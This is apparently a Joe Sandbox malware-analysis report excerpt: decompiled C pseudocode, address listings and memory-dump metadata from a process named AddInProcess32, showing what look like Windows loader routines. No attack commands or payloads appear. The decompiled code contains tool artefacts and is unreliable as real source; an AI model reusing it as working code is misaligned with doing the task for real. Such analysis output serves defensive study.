                              																				__eflags = _t290 & 0x00000001;
                              																				if((_t290 & 0x00000001) != 0) {
                              																					_t217 = 1;
                              																					_v104 = 1;
                              																				}
                              																				_t290 = _v44;
                              																				_v52 = _t290;
                              																			}
                              																			__eflags = _t217 - 1;
                              																			if(_t217 != 1) {
                              																				_t369 = 0;
                              																				_t218 = _v40;
                              																				goto L91;
                              																			} else {
                              																				_v64 = 0;
                              																				E0186E9C0(1, _t290, 0, 0,  &_v64);
                              																				_t309 = _v64;
                              																				_v108 = _t309;
                              																				__eflags = _t309;
                              																				if(_t309 == 0) {
                              																					goto L143;
                              																				} else {
                              																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
                              																					__eflags = _t226 - 0x10b;
                              																					if(_t226 != 0x10b) {
                              																						__eflags = _t226 - 0x20b;
                              																						if(_t226 != 0x20b) {
                              																							goto L143;
                              																						} else {
                              																							_t371 =  *(_t309 + 0x98);
                              																							goto L83;
                              																						}
                              																					} else {
                              																						_t371 =  *(_t309 + 0x88);
                              																						L83:
                              																						__eflags = _t371;
                              																						if(_t371 != 0) {
                              																							_v80 = _t371 - _t356 + _t290;
                              																							_t310 = _v64;
                              																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
                              																							_t292 =  *(_t310 + 6) & 0x0000ffff;
                              																							_t311 = 0;
                              																							__eflags = 0;
                              																							while(1) {
                              																								_v120 = _t311;
                              																								_v116 = _t348;
                              																								__eflags = _t311 - _t292;
                              																								if(_t311 >= _t292) {
                              																									goto L143;
                              																								}
                              																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
                              																								__eflags = _t371 - _t359;
                              																								if(_t371 < _t359) {
                              																									L98:
                              																									_t348 = _t348 + 0x28;
                              																									_t311 = _t311 + 1;
                              																									continue;
                              																								} else {
                              																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
                              																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
                              																										goto L98;
                              																									} else {
                              																										__eflags = _t348;
                              																										if(_t348 == 0) {
                              																											goto L143;
                              																										} else {
                              																											_t218 = _v40;
                              																											_t312 =  *_t218;
                              																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
                              																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
                              																												_v100 = _t359;
                              																												_t360 = _v108;
                              																												_t372 = L01868F44(_v108, _t312);
                              																												__eflags = _t372;
                              																												if(_t372 == 0) {
                              																													goto L143;
                              																												} else {
                              																													_t290 = _v52;
                              																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E01893C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
                              																													_t307 = _v72;
                              																													_t344 = _v76;
                              																													_t218 = _v40;
                              																													goto L91;
                              																												}
                              																											} else {
                              																												_t290 = _v52;
                              																												_t307 = _v72;
                              																												_t344 = _v76;
                              																												_t369 = _v80;
                              																												L91:
                              																												_t358 = _a4;
                              																												__eflags = _t358;
                              																												if(_t358 == 0) {
                              																													L95:
                              																													_t308 = _a8;
                              																													__eflags = _t308;
                              																													if(_t308 != 0) {
                              																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
                              																													}
                              																													_v8 = 0xfffffffe;
                              																													_t211 = _v84;
                              																												} else {
                              																													_t370 =  *_t218 - _t369 + _t290;
                              																													 *_t358 = _t370;
                              																													__eflags = _t370 - _t344;
                              																													if(_t370 <= _t344) {
                              																														L149:
                              																														 *_t358 = 0;
                              																														goto L150;
                              																													} else {
                              																														__eflags = _t307;
                              																														if(_t307 == 0) {
                              																															goto L95;
                              																														} else {
                              																															__eflags = _t370 - _t344 + _t307;
                              																															if(_t370 >= _t344 + _t307) {
                              																																goto L149;
                              																															} else {
                              																																goto L95;
                              																															}
                              																														}
                              																													}
                              																												}
                              																											}
                              																										}
                              																									}
                              																								}
                              																								goto L97;
                              																							}
                              																						}
                              																						goto L143;
                              																					}
                              																				}
                              																			}
                              																		} else {
                              																			__eflags = _v40 - _t307 + _t344;
                              																			if(_v40 >= _t307 + _t344) {
                              																				goto L150;
                              																			} else {
                              																				goto L75;
                              																			}
                              																		}
                              																	}
                              																}
                              															}
                              															L97:
                              															 *[fs:0x0] = _v20;
                              															return _t211;
                              														}
                              													}
                              												}
                              											}
                              										} else {
                              											goto L46;
                              										}
                              									}
                              								}
                              								goto L151;
                              							}
                              							_t288 = _v164;
                              							_t366 = 0xc0000135;
                              							goto L41;
                              						}
                              					}
                              				}
                              				L151:
                              			}

                              0x0186d8ac
                              0x0186d8ae
                              0x0186d8b4
                              0x0186d8b4
                              0x0186d8ae
                              0x0186d7a5
                              0x0186d78b
                              0x0186d7b1
                              0x018bb3c5
                              0x018bb3c5
                              0x0186d7c3
                              0x0186d7ca
                              0x0186d7e5
                              0x0186d7eb
                              0x0186d8eb
                              0x0186d8ed
                              0x00000000
                              0x0186d8f3
                              0x0186d8f3
                              0x0186d8f3
                              0x00000000
                              0x0186d8ed
                              0x0186d7cc
                              0x0186d7cc
                              0x0186d7d2
                              0x00000000
                              0x0186d7d4
                              0x0186d7d4
                              0x0186d7d7
                              0x0186d7df
                              0x018bb3d4
                              0x018bb3d9
                              0x018bb3dc
                              0x018bb3dc
                              0x018bb3df
                              0x018bb3e2
                              0x018bb468
                              0x018bb46d
                              0x018bb46f
                              0x018bb46f
                              0x018bb475
                              0x0186d8f8
                              0x0186d8f9
                              0x0186d8fd
                              0x018bb3e8
                              0x018bb3e8
                              0x018bb3eb
                              0x018bb3ed
                              0x00000000
                              0x018bb3ef
                              0x018bb3ef
                              0x018bb3f1
                              0x018bb3f4
                              0x018bb3fe
                              0x018bb404
                              0x018bb409
                              0x018bb40e
                              0x018bb410
                              0x018bb410
                              0x018bb414
                              0x018bb414
                              0x018bb41b
                              0x018bb420
                              0x018bb423
                              0x018bb425
                              0x018bb427
                              0x018bb42a
                              0x018bb42d
                              0x018bb42d
                              0x018bb42a
                              0x018bb432
                              0x018bb436
                              0x018bb438
                              0x018bb43b
                              0x018bb43b
                              0x018bb449
                              0x018bb44e
                              0x018bb454
                              0x018bb458
                              0x018bb458
                              0x018bb45d
                              0x00000000
                              0x018bb45d
                              0x018bb3ed
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0186d7df
                              0x0186d7d2
                              0x0186d7ca
                              0x018bb37c
                              0x018bb37e
                              0x018bb385
                              0x018bb38a
                              0x00000000
                              0x018bb38a
                              0x0186d742
                              0x0186d7f1
                              0x0186d7f8
                              0x018bb49b
                              0x018bb49b
                              0x0186d800
                              0x0186d837
                              0x0186d843
                              0x0186d845
                              0x0186d847
                              0x0186d84a
                              0x0186d84b
                              0x0186d84e
                              0x0186d857
                              0x0186d802
                              0x0186d802
                              0x0186d80d
                              0x00000000
                              0x0186d818
                              0x0186d818
                              0x0186d824
                              0x0186d831
                              0x018bb4a5
                              0x018bb4ab
                              0x018bb4b3
                              0x018bb4b8
                              0x018bb4bb
                              0x00000000
                              0x018bb4c1
                              0x018bb4c1
                              0x018bb4c8
                              0x00000000
                              0x018bb4ce
                              0x018bb4d4
                              0x018bb4e1
                              0x018bb4e3
                              0x018bb4e5
                              0x00000000
                              0x018bb4eb
                              0x018bb4f0
                              0x018bb4f2
                              0x0186dac9
                              0x0186dacc
                              0x0186dacf
                              0x0186dad1
                              0x0186dd78
                              0x0186dd78
                              0x0186dcf2
                              0x00000000
                              0x0186dad7
                              0x0186dad9
                              0x0186dadb
                              0x00000000
                              0x00000000
                              0x0186dae1
                              0x0186dae1
                              0x0186dae4
                              0x0186dae6
                              0x018bb4f9
                              0x018bb4f9
                              0x018bb500
                              0x0186daec
                              0x0186daec
                              0x0186daf5
                              0x0186daf8
                              0x0186dafb
                              0x0186db03
                              0x0186db11
                              0x0186db16
                              0x0186db19
                              0x0186db1b
                              0x018bb52c
                              0x018bb531
                              0x018bb534
                              0x0186db21
                              0x0186db21
                              0x0186db24
                              0x0186dcd9
                              0x0186dce2
                              0x0186dce5
                              0x0186dd6a
                              0x0186dd6d
                              0x00000000
                              0x0186dd73
                              0x018bb51a
                              0x018bb51c
                              0x018bb51f
                              0x018bb524
                              0x00000000
                              0x018bb524
                              0x0186dce7
                              0x0186dce7
                              0x0186dce7
                              0x00000000
                              0x0186dce7
                              0x00000000
                              0x0186db2a
                              0x0186db2c
                              0x0186db31
                              0x0186db33
                              0x0186db36
                              0x0186db39
                              0x0186db3b
                              0x0186db66
                              0x0186db66
                              0x0186db3d
                              0x0186db3d
                              0x0186db3e
                              0x0186db46
                              0x0186db47
                              0x0186db49
                              0x0186db4c
                              0x0186db53
                              0x0186db55
                              0x0186db58
                              0x0186db5a
                              0x018bb50a
                              0x018bb50f
                              0x018bb512
                              0x0186db60
                              0x0186db60
                              0x0186db63
                              0x0186db63
                              0x00000000
                              0x0186db63
                              0x0186db5a
                              0x0186db3b
                              0x0186db24
                              0x0186db69
                              0x0186db69
                              0x0186db6c
                              0x0186db6f
                              0x0186db74
                              0x018bb557
                              0x018bb557
                              0x018bb55e
                              0x0186db7a
                              0x0186db7c
                              0x0186db7f
                              0x0186db82
                              0x0186db85
                              0x00000000
                              0x0186db8b
                              0x0186db8b
                              0x0186db8d
                              0x0186db9b
                              0x0186db9b
                              0x0186db9d
                              0x0186dba0
                              0x0186dba2
                              0x0186dba4
                              0x0186dba7
                              0x0186dba9
                              0x0186dbae
                              0x0186dbae
                              0x0186dbb1
                              0x0186dbb4
                              0x0186dbb4
                              0x0186dbb7
                              0x0186dbba
                              0x0186dcd2
                              0x0186dcd4
                              0x00000000
                              0x0186dbc0
                              0x0186dbc0
                              0x0186dbd2
                              0x0186dbd7
                              0x0186dbda
                              0x0186dbdd
                              0x0186dbdf
                              0x00000000
                              0x0186dbe5
                              0x0186dbe5
                              0x0186dbee
                              0x0186dbf1
                              0x018bb541
                              0x018bb544
                              0x00000000
                              0x018bb546
                              0x018bb546
                              0x00000000
                              0x018bb546
                              0x0186dbf7
                              0x0186dbf7
                              0x0186dbfd
                              0x0186dbfd
                              0x0186dbff
                              0x0186dc0b
                              0x0186dc15
                              0x0186dc1b
                              0x0186dc1d
                              0x0186dc21
                              0x0186dc21
                              0x0186dc23
                              0x0186dc23
                              0x0186dc26
                              0x0186dc29
                              0x0186dc2b
                              0x00000000
                              0x00000000
                              0x0186dc31
                              0x0186dc34
                              0x0186dc36
                              0x0186dcbf
                              0x0186dcbf
                              0x0186dcc2
                              0x00000000
                              0x0186dc3c
                              0x0186dc41
                              0x0186dc43
                              0x00000000
                              0x0186dc45
                              0x0186dc45
                              0x0186dc47
                              0x00000000
                              0x0186dc4d
                              0x0186dc4d
                              0x0186dc50
                              0x0186dc52
                              0x0186dc55
                              0x0186dcfa
                              0x0186dcfe
                              0x0186dd08
                              0x0186dd0a
                              0x0186dd0c
                              0x00000000
                              0x0186dd12
                              0x0186dd15
                              0x0186dd2d
                              0x0186dd2f
                              0x0186dd32
                              0x0186dd35
                              0x00000000
                              0x0186dd35
                              0x0186dc5b
                              0x0186dc5b
                              0x0186dc5e
                              0x0186dc61
                              0x0186dc64
                              0x0186dc67
                              0x0186dc67
                              0x0186dc6a
                              0x0186dc6c
                              0x0186dc8e
                              0x0186dc8e
                              0x0186dc91
                              0x0186dc93
                              0x0186dcce
                              0x0186dcce
                              0x0186dc95
                              0x0186dc9c
                              0x0186dc6e
                              0x0186dc72
                              0x0186dc75
                              0x0186dc77
                              0x0186dc79
                              0x018bb551
                              0x018bb551
                              0x00000000
                              0x0186dc7f
                              0x0186dc7f
                              0x0186dc81
                              0x00000000
                              0x0186dc83
                              0x0186dc86
                              0x0186dc88
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0186dc88
                              0x0186dc81
                              0x0186dc79
                              0x0186dc6c
                              0x0186dc55
                              0x0186dc47
                              0x0186dc43
                              0x00000000
                              0x0186dc36
                              0x0186dc23
                              0x00000000
                              0x0186dbff
                              0x0186dbf1
                              0x0186dbdf
                              0x0186db8f
                              0x0186db92
                              0x0186db95
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0186db95
                              0x0186db8d
                              0x0186db85
                              0x0186db74
                              0x0186dc9f
                              0x0186dca2
                              0x0186dcb0
                              0x0186dcb0
                              0x0186dad1
                              0x018bb4e5
                              0x018bb4c8
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0186d831
                              0x0186d80d
                              0x00000000
                              0x0186d800
                              0x018bb47f
                              0x018bb485
                              0x00000000
                              0x018bb485
                              0x0186d665
                              0x0186d652
                              0x00000000

                              APIs
                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID: DebugPrintTimes
                              • String ID:
                              • API String ID: 3446177414-0
                              • Opcode ID: d4042993dcb9e78932a6963e0affa087bbcfc2b00f2d3d3068280c1a601a611e
                              • Instruction ID: 482bb0a662a3639453dcd23f73825217c74fae2d2dfaf7195c336df03df136fa
                              • Opcode Fuzzy Hash: d4042993dcb9e78932a6963e0affa087bbcfc2b00f2d3d3068280c1a601a611e
                              • Instruction Fuzzy Hash: ECE1C234B05359CFEB25CF58C884BA9B7BABF45314F040299D949D7291D734AF81CB92
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 67%
                              			E0188513A(intOrPtr __ecx, void* __edx) {
                              				signed int _v8;
                              				signed char _v16;
                              				intOrPtr _v20;
                              				intOrPtr _v24;
                              				char _v28;
                              				signed int _v32;
                              				signed int _v36;
                              				signed int _v40;
                              				intOrPtr _v44;
                              				intOrPtr _v48;
                              				char _v63;
                              				char _v64;
                              				signed int _v72;
                              				signed int _v76;
                              				signed int _v80;
                              				signed int _v84;
                              				signed int _v88;
                              				signed char* _v92;
                              				signed int _v100;
                              				signed int _v104;
                              				char _v105;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				void* _t157;
                              				signed int _t159;
                              				signed int _t160;
                              				unsigned int* _t161;
                              				intOrPtr _t165;
                              				signed int _t172;
                              				signed char* _t181;
                              				intOrPtr _t189;
                              				intOrPtr* _t200;
                              				signed int _t202;
                              				signed int _t203;
                              				char _t204;
                              				signed int _t207;
                              				signed int _t208;
                              				void* _t209;
                              				intOrPtr _t210;
                              				signed int _t212;
                              				signed int _t214;
                              				signed int _t221;
                              				signed int _t222;
                              				signed int _t226;
                              				intOrPtr* _t232;
                              				signed int _t233;
                              				signed int _t234;
                              				intOrPtr _t237;
                              				intOrPtr _t238;
                              				intOrPtr _t240;
                              				void* _t245;
                              				signed int _t246;
                              				signed int _t247;
                              				void* _t248;
                              				void* _t251;
                              				void* _t252;
                              				signed int _t253;
                              				signed int _t255;
                              				signed int _t256;
                              
                              				_t255 = (_t253 & 0xfffffff8) - 0x6c;
                              				_v8 =  *0x194d360 ^ _t255;
                              				_v32 = _v32 & 0x00000000;
                              				_t251 = __edx;
                              				_t237 = __ecx;
                              				_t212 = 6;
                              				_t245 =  &_v84;
                              				_t207 =  *((intOrPtr*)(__ecx + 0x48));
                              				_v44 =  *((intOrPtr*)(__edx + 0xc8));
                              				_v48 = __ecx;
                              				_v36 = _t207;
                              				_t157 = memset(_t245, 0, _t212 << 2);
                              				_t256 = _t255 + 0xc;
                              				_t246 = _t245 + _t212;
                              				if(_t207 == 2) {
                              					_t247 =  *(_t237 + 0x60);
                              					_t208 =  *(_t237 + 0x64);
                              					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
                              					_t159 =  *((intOrPtr*)(_t237 + 0x58));
                              					_v104 = _t159;
                              					_v76 = _t159;
                              					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
                              					_v100 = _t160;
                              					_v72 = _t160;
                              					L19:
                              					_v80 = _t208;
                              					_v84 = _t247;
                              					L8:
                              					_t214 = 0;
                              					if( *(_t237 + 0x74) > 0) {
                              						_t82 = _t237 + 0x84; // 0x124
                              						_t161 = _t82;
                              						_v92 = _t161;
                              						while( *_t161 >> 0x1f != 0) {
                              							_t200 = _v92;
                              							if( *_t200 == 0x80000000) {
                              								break;
                              							}
                              							_t214 = _t214 + 1;
                              							_t161 = _t200 + 0x10;
                              							_v92 = _t161;
                              							if(_t214 <  *(_t237 + 0x74)) {
                              								continue;
                              							}
                              							goto L9;
                              						}
                              						_v88 = _t214 << 4;
                              						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
                              						_t165 = 0;
                              						asm("adc eax, [ecx+edx+0x7c]");
                              						_v24 = _t165;
                              						_v28 = _v40;
                              						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
                              						_t221 = _v40;
                              						_v16 =  *_v92;
                              						_v32 =  &_v28;
                              						if( *(_t237 + 0x4e) >> 0xf == 0) {
                              							goto L9;
                              						}
                              						_t240 = _v48;
                              						if( *_v92 != 0x80000000) {
                              							goto L9;
                              						}
                              						 *((intOrPtr*)(_t221 + 8)) = 0;
                              						 *((intOrPtr*)(_t221 + 0xc)) = 0;
                              						 *((intOrPtr*)(_t221 + 0x14)) = 0;
                              						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
                              						_t226 = 0;
                              						_t181 = _t251 + 0x66;
                              						_v88 = 0;
                              						_v92 = _t181;
                              						do {
                              							if( *((char*)(_t181 - 2)) == 0) {
                              								goto L31;
                              							}
                              							_t226 = _v88;
                              							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
                              								_t181 = E0189D0F0(1, _t226 + 0x20, 0);
                              								_t226 = _v40;
                              								 *(_t226 + 8) = _t181;
                              								 *((intOrPtr*)(_t226 + 0xc)) = 0;
                              								L34:
                              								if(_v44 == 0) {
                              									goto L9;
                              								}
                              								_t210 = _v44;
                              								_t127 = _t210 + 0x1c; // 0x1c
                              								_t249 = _t127;
                              								E01872280(_t181, _t127);
                              								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
                              								_t185 =  *((intOrPtr*)(_t210 + 0x94));
                              								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
                              									L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
                              								}
                              								_t189 = L01874620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
                              								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
                              								if(_t189 != 0) {
                              									 *((intOrPtr*)(_t189 + 8)) = _v20;
                              									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
                              									_t232 =  *((intOrPtr*)(_t210 + 0x94));
                              									 *_t232 = _t232 + 0x10;
                              									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
                              									E0189F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
                              									_t256 = _t256 + 0xc;
                              								}
                              								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
                              								E0186FFB0(_t210, _t249, _t249);
                              								_t222 = _v76;
                              								_t172 = _v80;
                              								_t208 = _v84;
                              								_t247 = _v88;
                              								L10:
                              								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
                              								_v44 = _t238;
                              								if(_t238 != 0) {
                              									 *0x194b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
                              									_v44();
                              								}
                              								_pop(_t248);
                              								_pop(_t252);
                              								_pop(_t209);
                              								return E0189B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
                              							}
                              							_t181 = _v92;
                              							L31:
                              							_t226 = _t226 + 1;
                              							_t181 =  &(_t181[0x18]);
                              							_v88 = _t226;
                              							_v92 = _t181;
                              						} while (_t226 < 4);
                              						goto L34;
                              					}
                              					L9:
                              					_t172 = _v104;
                              					_t222 = _v100;
                              					goto L10;
                              				}
                              				_t247 = _t246 | 0xffffffff;
                              				_t208 = _t247;
                              				_v84 = _t247;
                              				_v80 = _t208;
                              				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
                              					_t233 = _v72;
                              					_v105 = _v64;
                              					_t202 = _v76;
                              				} else {
                              					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
                              					_v105 = 1;
                              					if(_v63 <= _t204) {
                              						_v63 = _t204;
                              					}
                              					_t202 = _v76 |  *(_t251 + 0x40);
                              					_t233 = _v72 |  *(_t251 + 0x44);
                              					_t247 =  *(_t251 + 0x38);
                              					_t208 =  *(_t251 + 0x3c);
                              					_v76 = _t202;
                              					_v72 = _t233;
                              					_v84 = _t247;
                              					_v80 = _t208;
                              				}
                              				_v104 = _t202;
                              				_v100 = _t233;
                              				if( *((char*)(_t251 + 0xc4)) != 0) {
                              					_t237 = _v48;
                              					_v105 = 1;
                              					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
                              						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
                              						_t237 = _v48;
                              					}
                              					_t203 = _t202 |  *(_t251 + 0xb8);
                              					_t234 = _t233 |  *(_t251 + 0xbc);
                              					_t247 = _t247 &  *(_t251 + 0xb0);
                              					_t208 = _t208 &  *(_t251 + 0xb4);
                              					_v104 = _t203;
                              					_v76 = _t203;
                              					_v100 = _t234;
                              					_v72 = _t234;
                              					_v84 = _t247;
                              					_v80 = _t208;
                              				}
                              				if(_v105 == 0) {
                              					_v36 = _v36 & 0x00000000;
                              					_t208 = 0;
                              					_t247 = 0;
                              					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
                              					goto L19;
                              				} else {
                              					_v36 = 1;
                              					goto L8;
                              				}
                              			}

                              APIs
                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID: DebugPrintTimes
                              • String ID:
                              • API String ID: 3446177414-0
                              • Opcode ID: 903231e00fe8d3ce1530e2956699869286d8d9e5367fb6f5bb1cdd240dbba2fd
                              • Instruction ID: 3a9caa94a8bcb3d5773db13f28afb12a8099fc40680bfc6ce7f8f71da0e73971
                              • Opcode Fuzzy Hash: 903231e00fe8d3ce1530e2956699869286d8d9e5367fb6f5bb1cdd240dbba2fd
                              • Instruction Fuzzy Hash: 89C102755083818FD355CF28C580A5AFBE1BF88704F284A6EF9998B352D771EA45CB42
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 74%
                              			E018803E2(signed int __ecx, signed int __edx) {
                              				signed int _v8;
                              				signed int _v12;
                              				signed int _v16;
                              				signed int _v20;
                              				signed int _v24;
                              				signed int _v28;
                              				signed int _v32;
                              				signed int _v36;
                              				intOrPtr _v40;
                              				signed int _v44;
                              				signed int _v48;
                              				char _v52;
                              				char _v56;
                              				char _v64;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t56;
                              				signed int _t58;
                              				char* _t64;
                              				intOrPtr _t65;
                              				signed int _t74;
                              				signed int _t79;
                              				char* _t83;
                              				intOrPtr _t84;
                              				signed int _t93;
                              				signed int _t94;
                              				signed char* _t95;
                              				signed int _t99;
                              				signed int _t100;
                              				signed char* _t101;
                              				signed int _t105;
                              				signed int _t119;
                              				signed int _t120;
                              				void* _t122;
                              				signed int _t123;
                              				signed int _t127;
                              
                              				_v8 =  *0x194d360 ^ _t127;
                              				_t119 = __ecx;
                              				_t105 = __edx;
                              				_t118 = 0;
                              				_v20 = __edx;
                              				_t120 =  *(__ecx + 0x20);
                              				if(E01880548(__ecx, 0) != 0) {
                              					_t56 = 0xc000022d;
                              					L23:
                              					return E0189B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
                              				} else {
                              					_v12 = _v12 | 0xffffffff;
                              					_t58 = _t120 + 0x24;
                              					_t109 =  *(_t120 + 0x18);
                              					_t118 = _t58;
                              					_v16 = _t58;
                              					E0186B02A( *(_t120 + 0x18), _t118, 0x14a5);
                              					_v52 = 0x18;
                              					_v48 = 0;
                              					0x840 = 0x40;
                              					if( *0x1947c1c != 0) {
                              					}
                              					_v40 = 0x840;
                              					_v44 = _t105;
                              					_v36 = 0;
                              					_v32 = 0;
                              					if(E01877D50() != 0) {
                              						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                              					} else {
                              						_t64 = 0x7ffe0384;
                              					}
                              					if( *_t64 != 0) {
                              						_t65 =  *[fs:0x30];
                              						__eflags =  *(_t65 + 0x240) & 0x00000004;
                              						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
                              							_t100 = E01877D50();
                              							__eflags = _t100;
                              							if(_t100 == 0) {
                              								_t101 = 0x7ffe0385;
                              							} else {
                              								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                              							}
                              							__eflags =  *_t101 & 0x00000020;
                              							if(( *_t101 & 0x00000020) != 0) {
                              								_t118 = _t118 | 0xffffffff;
                              								_t109 = 0x1485;
                              								E018D7016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
                              							}
                              						}
                              					}
                              					_t105 = 0;
                              					while(1) {
                              						_push(0x60);
                              						_push(5);
                              						_push( &_v64);
                              						_push( &_v52);
                              						_push(0x100021);
                              						_push( &_v12);
                              						_t122 = E01899830();
                              						if(_t122 >= 0) {
                              							break;
                              						}
                              						__eflags = _t122 - 0xc0000034;
                              						if(_t122 == 0xc0000034) {
                              							L38:
                              							_t120 = 0xc0000135;
                              							break;
                              						}
                              						__eflags = _t122 - 0xc000003a;
                              						if(_t122 == 0xc000003a) {
                              							goto L38;
                              						}
                              						__eflags = _t122 - 0xc0000022;
                              						if(_t122 != 0xc0000022) {
                              							break;
                              						}
                              						__eflags = _t105;
                              						if(__eflags != 0) {
                              							break;
                              						}
                              						_t109 = _t119;
                              						_t99 = E018D69A6(_t119, __eflags);
                              						__eflags = _t99;
                              						if(_t99 == 0) {
                              							break;
                              						}
                              						_t105 = _t105 + 1;
                              					}
                              					if( !_t120 >= 0) {
                              						L22:
                              						_t56 = _t120;
                              						goto L23;
                              					}
                              					if( *0x1947c04 != 0) {
                              						_t118 = _v12;
                              						_t120 = E018DA7AC(_t119, _t118, _t109);
                              						__eflags = _t120;
                              						if(_t120 >= 0) {
                              							goto L10;
                              						}
                              						__eflags =  *0x1947bd8;
                              						if( *0x1947bd8 != 0) {
                              							L20:
                              							if(_v12 != 0xffffffff) {
                              								_push(_v12);
                              								E018995D0();
                              							}
                              							goto L22;
                              						}
                              					}
                              					L10:
                              					_push(_v12);
                              					_t105 = _t119 + 0xc;
                              					_push(0x1000000);
                              					_push(0x10);
                              					_push(0);
                              					_push(0);
                              					_push(0xf);
                              					_push(_t105);
                              					_t120 = E018999A0();
                              					if(_t120 < 0) {
                              						__eflags = _t120 - 0xc000047e;
                              						if(_t120 == 0xc000047e) {
                              							L51:
                              							_t74 = E018D3540(_t120);
                              							_t119 = _v16;
                              							_t120 = _t74;
                              							L52:
                              							_t118 = 0x1485;
                              							E0185B1E1(_t120, 0x1485, 0, _t119);
                              							goto L20;
                              						}
                              						__eflags = _t120 - 0xc000047f;
                              						if(_t120 == 0xc000047f) {
                              							goto L51;
                              						}
                              						__eflags = _t120 - 0xc0000462;
                              						if(_t120 == 0xc0000462) {
                              							goto L51;
                              						}
                              						_t119 = _v16;
                              						__eflags = _t120 - 0xc0000017;
                              						if(_t120 != 0xc0000017) {
                              							__eflags = _t120 - 0xc000009a;
                              							if(_t120 != 0xc000009a) {
                              								__eflags = _t120 - 0xc000012d;
                              								if(_t120 != 0xc000012d) {
                              									_v28 = _t119;
                              									_push( &_v56);
                              									_push(1);
                              									_v24 = _t120;
                              									_push( &_v28);
                              									_push(1);
                              									_push(2);
                              									_push(0xc000007b);
                              									_t79 = E0189AAF0();
                              									__eflags = _t79;
                              									if(_t79 >= 0) {
                              										__eflags =  *0x1948474 - 3;
                              										if( *0x1948474 != 3) {
                              											 *0x19479dc =  *0x19479dc + 1;
                              										}
                              									}
                              								}
                              							}
                              						}
                              						goto L52;
                              					}
                              					if(E01877D50() != 0) {
                              						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                              					} else {
                              						_t83 = 0x7ffe0384;
                              					}
                              					if( *_t83 != 0) {
                              						_t84 =  *[fs:0x30];
                              						__eflags =  *(_t84 + 0x240) & 0x00000004;
                              						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
                              							_t94 = E01877D50();
                              							__eflags = _t94;
                              							if(_t94 == 0) {
                              								_t95 = 0x7ffe0385;
                              							} else {
                              								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                              							}
                              							__eflags =  *_t95 & 0x00000020;
                              							if(( *_t95 & 0x00000020) != 0) {
                              								E018D7016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
                              							}
                              						}
                              					}
                              					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
                              						if( *0x1948708 != 0) {
                              							_t118 =  *0x7ffe0330;
                              							_t123 =  *0x1947b00; // 0x0
                              							asm("ror esi, cl");
                              							 *0x194b1e0(_v12, _v20, 0x20);
                              							_t93 =  *(_t123 ^  *0x7ffe0330)();
